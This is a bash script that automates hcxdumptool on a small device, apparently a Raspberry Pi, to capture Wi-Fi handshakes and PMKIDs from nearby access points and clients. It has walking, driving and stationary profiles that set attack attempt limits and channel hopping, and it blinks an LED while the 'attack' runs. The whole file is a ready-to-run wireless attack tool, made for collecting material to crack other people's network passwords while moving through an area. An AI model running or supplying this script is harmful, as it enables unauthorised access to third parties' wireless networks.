#!/usr/bin/env bash

# ############################################ #
# **************** CONFIG ******************** #
stationary=			# leave empty
capdir=/root/$(date +'%m-%d')/caps
bpf=/root/0wn.bpf
logfile=/root/autohcxdump.log
ssidlst=/root/standard.essidliste

# ************* walking speed ****************
attempts='--attemptapmax=1000 --attemptclientmax=50'
chans='-c 1a,6a,11a,2a,1a,6a,11a,13a,1a,6a,11a,3a,1a,6a,11a,12a,1a,6a,11a,4a,1a,6a,11a,10a,1a,6a,11a,5a,1a,6a,11a,9a,1a,6a,11a,7a,1a,6a,11a,8a'
staytime=
# ********************************************

# # ************* driving speed ****************
# attempts='--attemptapmax=10 --attemptclientmax=4'
# chans=				# leave empty
# staytime=
# # ********************************************

# # *********** stationary (home) **************
# stationary=true			# disable ethernet check
# attempts='--attemptclientmax=2'	# prevent attacking clients (in BPF) probing multiple APs
# chans='-c 1a,3a,6a,5a,2a,7a,4a'	# depends on the channel of your AP (11 in this case)
# staytime='-t 120'			# increasing stay time to 2mins
# # ********************************************
# ############################################## #

exec &> >(tee -a $logfile)
trap trapfunc SIGINT SIGTERM
iw reg set DE > /dev/null

sleep 10	# otherwise ethernet connection isn't detected reliably

check_ethernet()
{
	if [ "$(cat /sys/class/net/eth0/operstate)" == "up" ]; then
	echo "[x]	Ethernet connected - Exiting!"
	exit
	fi
}

trapfunc()
{
	[ -z $blinkpid ] || kill $blinkpid
	echo "$(date "+%m/%d %H:%M")    autohcxdump stopped"
	exit 0
}

#	prevent accidental attacks
[ -n "$stationary" ] || check_ethernet

echo '*===========================================================================*'
echo "$(date "+%m/%d %H:%M")    autohcxdump started"
echo 'Checking Iface'

# 	looping until iface is found
if ! ls -1 /sys/class/net | grep -q ^wl; then
	echo "Looping until iface is found..."
	until ls -1 /sys/class/net | grep -q ^wl
	do
		sleep 10
	done
fi

echo 'iface found, starting attack!'
mkdir -p $capdir
cd $capdir || echo "Couldn't cd into $capdir, using $(pwd)"

gpio blink 7 & 		# 	Pulse LED to indicate attack
blinkpid=$!
hcxdumptool --bpf=$bpf --watchdog=30 --onwatchdog=reboot --onerror=reboot --errormax=20 --essidlist=$ssidlst $attempts $chans $staytime

[ -z $blinkpid ] || kill $blinkpid
